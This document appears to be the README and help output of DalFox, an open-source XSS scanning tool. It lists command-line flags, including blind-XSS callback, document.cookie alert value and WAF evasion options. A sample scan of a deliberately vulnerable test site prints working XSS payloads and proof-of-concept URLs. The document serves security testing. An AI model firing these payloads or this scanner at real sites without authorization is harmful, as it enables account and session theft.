DalFox is an powerful open source XSS scanning tool and parameter analyzer and utility that fast the process of detecting and verify XSS flaws. It comes with a powerful testing engine, many niche features for the cool hacker
I talk about naming. Dal(달) is the Korean pronunciation of moon, and Fox are made to mean “Finder Of XSS” or 🦊
git clone https://github.com/hahwul/dalfox
go install
dalfox [flags]
dalfox [command]
Available Commands:
completion Generate the autocompletion script for the specified shell
file Use file mode(targets list or rawdata)
help Help about any command
payload Payload mode, make and enum payloads
pipe Use pipeline mode
server Start API Server
sxss Use Stored XSS mode
url Use single target mode
version Show version
-b, --blind string Add your blind xss
* Example: -b hahwul.xss.ht
--config string Using config from file
-C, --cookie string Add custom cookie
--cookie-from-raw string Load cookie from burp raw http request
* Example: --cookie-from-raw request.txt
--custom-alert-type string Change alert value type
* Example: --custom-alert-type=none / --custom-alert-type=str,none (default "none")
--custom-alert-value string Change alert value
* Example: --custom-alert-value=document.cookie (default "1")
--custom-payload string Add custom payloads from file
-d, --data string Using POST Method and add Body data
--debug debug mode, save all log using -o option
--deep-domxss DOM XSS Testing with more payloads on headless [so slow]
--delay int Milliseconds between send to same host (1000==1s)
-F, --follow-redirects Following redirection
--format string Stdout output format
* Supported: plain / json (default "plain")
--found-action string If found weak/vuln, action(cmd) to next
* Example: --found-action='./notify.sh'
--found-action-shell string Select shell application for --found-action (default "bash")
--grep string Using custom grepping file
* Example: --grep ./samples/sample_grep.json
-H, --header strings Add custom headers
-h, --help help for dalfox
--ignore-return string Ignore scanning from return code
* Example: --ignore-return 302,403,404
-X, --method string Force overriding HTTP Method
* Example: -X PUT (default "GET")
--mining-dict Find new parameter with dictionary attack, default is Gf-Patterns=>XSS (default true)
-W, --mining-dict-word string Custom wordlist file for param mining
* Example: --mining-dict-word word.txt
--mining-dom Find new parameter in DOM (attribute/js value) (default true)
--no-color Not use colorize
--no-spinner Not use spinner
--only-custom-payload Only testing custom payload (required --custom-payload)
--only-discovery Only testing parameter analysis (same '--skip-xss-scanning' option)
--only-poc string Shows only the PoC code for the specified pattern (g: grep / r: reflected / v: verified)
* Example: --only-poc='g,v'
-o, --output string Write to output file (By default, only the PoC code is saved)
--output-all All log write mode (-o or stdout)
-p, --param strings Only testing selected parameters
--poc-type string Select PoC type
* Supported: plain/curl/httpie/http-request
* Example: --poc-type='curl' (default "plain")
--proxy string Send all request to proxy server
* Example: --proxy
--remote-payloads string Using remote payload for XSS testing
* Supported: portswigger/payloadbox
* Example: --remote-payloads=portswigger,payloadbox
--remote-wordlists string Using remote wordlists for param mining
* Supported: burp/assetnote
* Example: --remote-wordlists=burp
-S, --silence Only print PoC Code and Progress(for pipe/file mode)
--skip-bav Skipping BAV(Basic Another Vulnerability) analysis
--skip-grepping Skipping built-in grepping
--skip-headless Skipping headless browser base scanning[DOM XSS and inJS verify]
--skip-mining-all Skipping ALL parameter mining
--skip-mining-dict Skipping Dict base parameter mining
--skip-mining-dom Skipping DOM base parameter mining
--skip-xss-scanning Skipping XSS Scanning (same '--only-discovery' option)
--timeout int Second of timeout (default 10)
--user-agent string Add custom UserAgent
--waf-evasion Avoid blocking by adjusting the speed when detecting WAF (worker=1 delay=3s)
-w, --worker int Number of worker (default 100)
Use "dalfox [command] --help" for more information about a command.
$ dalfox url http://testphp.vulnweb.com/listproducts.php\?cat\=123\&artist\=123\&asdf\=ff
.' .::::. __ _ _ ___ _ __ __
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: :::::::: | o ) o || |_ | _( o )) (
'. '::::::' |__/|_n_||___||_| \_//_n_\
Parameter Analysis and XSS Scanning tool based on golang
Finder Of XSS and Dal is the Korean pronunciation of moon. @hahwul
[*] Using single target mode
[*] Target URL: http://testphp.vulnweb.com/listproducts.php?cat=123&artist=123&asdf=ff
[*] Vaild target [ code:200 / size:4699 ]
[*] Start parameter analysis.. 🔍
[*] Start static analysis.. 🔍
[I] Content-Type is text/html
[I] Reflected cat param => inHTML[1] $
48 line: Error: Unknown column '123DalFox' in 'where cl
[*] Generate XSS payload and optimization.Optimization.. 🛠
[*] Start XSS Scanning.. with 230 queries 🗡
[W] Reflected Payload in HTML: cat="><script/"<a"/src=data:=".<a,[45].some(confirm)>
48 line: syntax to use near '"><script/"<a"/src=data:=".<a,[45].some(confirm)>' at line 1
+> http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%22%3E%3Cscript%2F%22%3Ca%22%2Fsrc%3Ddata%3A%3D%22.%3Ca%2C%5B45%5D.some%28confirm%29%3E
[V] Triggered XSS Payload (found DOM Object): cat="><svg/OnLoad="`${prompt``}`" class=dalfox>
48 line: syntax to use near '"><svg/OnLoad="`${prompt``}`" class=dalfox>' at line 1
+> http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%22%3E%3Csvg%2FOnLoad%3D%22%60%24%7Bprompt%60%60%7D%60%22+class%3Ddalfox%3E
[*] Finish :D